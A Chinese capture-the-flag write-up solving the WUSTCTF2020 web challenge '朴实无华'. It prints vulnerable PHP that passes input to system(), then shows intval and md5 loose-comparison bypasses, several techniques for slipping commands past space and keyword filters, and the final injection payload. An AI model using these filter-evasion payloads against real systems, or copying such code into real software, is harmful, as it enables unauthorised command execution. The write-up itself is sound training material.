[WUSTCTF2020]朴实无华
线索:
1、tittle:浜洪棿鏋佷箰bot。感觉是解码错误。
2、Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/index.php:3) in /var/www/html/index.php on line 4 大致意思就是因为index.php中第四行代码已经向客户端输出内容(猜测就是输出那个“Hack me”),这时候响应头已经发送给客户端了,后面再有代码修改头信息,就会报这个错误。但是如何利用呢?
抓包、目录扫描一下,没找到线索。看答案吧...
居然有robots.txt,但是为什么用dirsearch扫描没有发现?
访问一下:
User-agent: *
Disallow: /fAke_f1agggg.php
访问一下 fAke_f1agggg.php:flag{this_is_not_flag}
抓包看看,发现响应头里有线索:look_at_me: /fl4g.php,访问一下:
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);//level 1
if (isset($_GET['num'])){$num = $_GET['num'];if(intval($num) < 2020 && intval($num + 1) > 2021){echo "鎴戜笉缁忔剰闂寸湅浜嗙湅鎴戠殑鍔冲姏澹�, 涓嶆槸鎯崇湅鏃堕棿, 鍙槸鎯充笉缁忔剰闂�, 璁╀綘鐭ラ亾鎴戣繃寰楁瘮浣犲ソ.</br>";}else{die("閲戦挶瑙e喅涓嶄簡绌蜂汉鐨勬湰璐ㄩ棶棰�");}
}else{die("鍘婚潪娲插惂");
}
//level 2
if (isset($_GET['md5'])){$md5=$_GET['md5'];if ($md5==md5($md5))echo "鎯冲埌杩欎釜CTFer鎷垮埌flag鍚�, 鎰熸縺娑曢浂, 璺戝幓涓滄緶宀�, 鎵句竴瀹堕鍘�, 鎶婂帹甯堣桨鍑哄幓, 鑷繁鐐掍袱涓嬁鎵嬪皬鑿�, 鍊掍竴鏉暎瑁呯櫧閰�, 鑷村瘜鏈夐亾, 鍒灏忔毚.</br>";elsedie("鎴戣刀绱у枈鏉ユ垜鐨勯厭鑲夋湅鍙�, 浠栨墦浜嗕釜鐢佃瘽, 鎶婁粬涓€瀹跺畨鎺掑埌浜嗛潪娲�");
}else{die("鍘婚潪娲插惂");
}//get flag
if (isset($_GET['get_flag'])){$get_flag = $_GET['get_flag'];if(!strstr($get_flag," ")){$get_flag = str_ireplace("cat", "wctf2020", $get_flag);echo "鎯冲埌杩欓噷, 鎴戝厖瀹炶€屾鎱�, 鏈夐挶浜虹殑蹇箰寰€寰€灏辨槸杩欎箞鐨勬湸瀹炴棤鍗�, 涓旀灟鐕�.</br>";system($get_flag);}else{die("蹇埌闈炴床浜�");}
}else{die("鍘婚潪娲插惂");
}
?>
鍘婚潪娲插惂level1:我记得之前学过这个知识,是在md5那一章节,好像用的是类型转换的技巧。我忘了...看了一眼答案,原来我想的没错,确实是利用科学计数法字符串转换成数字,但是我测试的时候并非如此:
不知道为什么,以后再说吧,先做这道题。
?num=1e4 成功绕过。
level2:md5弱比较
QLTHNDT QNKCDZO PJNPDWY NWWKITQ NOOPCJF MMHUWUV MAUXXQC 240610708 s878926199a s155964671a s214587387a 0e215962017 0e1284838308
以上所有字符串的md5值都以0e开头,这些md5值从字符串解析为数字时被当作科学计数法都会转换成0。但是:
这说明如果两边都是符合科学计数法格式的字符串,会被转换成数字比较,但若只有一侧符合科学计数法格式,仍然会当作字符串比较。因此这里我们只能使用 0e215962017、0e1284838308之类的字符串绕过。
?num=1e4&md5=QLTHNDT 失败。
?num=1e4&md5=0e215962017 成功绕过。
level 3: 利用system注入命令
strstr函数可用于在一个字符串里查找另一个字符串首次出现的位置,并且会返回从该位置开始到原字符串末尾的所有内容。
str_ireplace()是一个用于字符串替换的内置函数,其功能与str_replace()类似,但不区分大小写。
因此注入的命令中不能有空格也不能有cat
- 利用特殊环境变量:在 Linux 系统中,可利用
$IFS环境变量来绕过空格,$IFS是内部字段分隔符,其默认值包含空格。可使用${IFS}、$IFS$9等形式来代替空格,如cat${IFS}flag.txt或ls${IFS}$9-l。- 使用制表符替代:
%09是制表符的 URL 编码,在一些情况下可用于替代空格,如cat%09flag.txt,相当于cat<Tab>flag.txt。- 利用大括号:可以使用大括号将命令和参数分开,如
{cat,flag.php},这种方式也能在一定程度上绕过对空格的限制。- 命令拼接:通过变量赋值来拼接命令,从而绕过空格限制。例如
a=c;b=at;$a$b flag.txt,相当于执行cat flag.txt。- 编码绕过:将包含空格的命令进行 Base64 编码或 HEX 编码等,然后再解码执行。如将
cat flag.txt编码为echo Y2F0IGZsYWcudHh0 | base64 -d,通过解码后执行命令。
尝试:
?num=1e4&md5=0e215962017&get_flag=ls
得到flag位置为fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag
num=1e4&md5=0e215962017&get_flag=a%3Dc%3Bb%3Dat%3B%24a%24b%24%7BIFS%7Dfllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag 得到flag
后面的内容是urlencode(a=c;b=at;$a$b${IFS}fll....)